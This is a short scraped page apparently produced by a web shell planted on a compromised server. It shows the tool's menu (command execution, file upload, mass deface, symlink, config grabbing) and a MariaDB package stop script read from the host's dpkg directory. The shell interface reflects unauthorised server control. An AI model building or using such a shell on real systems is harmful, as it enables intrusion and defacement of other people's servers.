OFF | cURL : OFF | WGET : ON | Perl : ON | Python : OFF Directory (0755) : /var/../srv/../var/lib/cloud/../sudo/../dpkg/info/ |
Home | ☍ Command | ☍ Upload File | ☍Info Server | ☍ Buat File | ☍ Mass deface | ☍ Jumping | ☍ Config | ☍ Symlink | ☍ About |
---|
#!/bin/sh set -e # Modified dh_systemd_start snippet that's not added automatically due /etc/init.d/mysql if [ -d /run/systemd/system ]; then deb-systemd-invoke stop mariadb.service >/dev/null # Modified dh_installinit snippet to only run with sysvinit elif [ -x "/etc/init.d/mysql" ]; then invoke-rc.d mysql stop || exit $? fi exit 0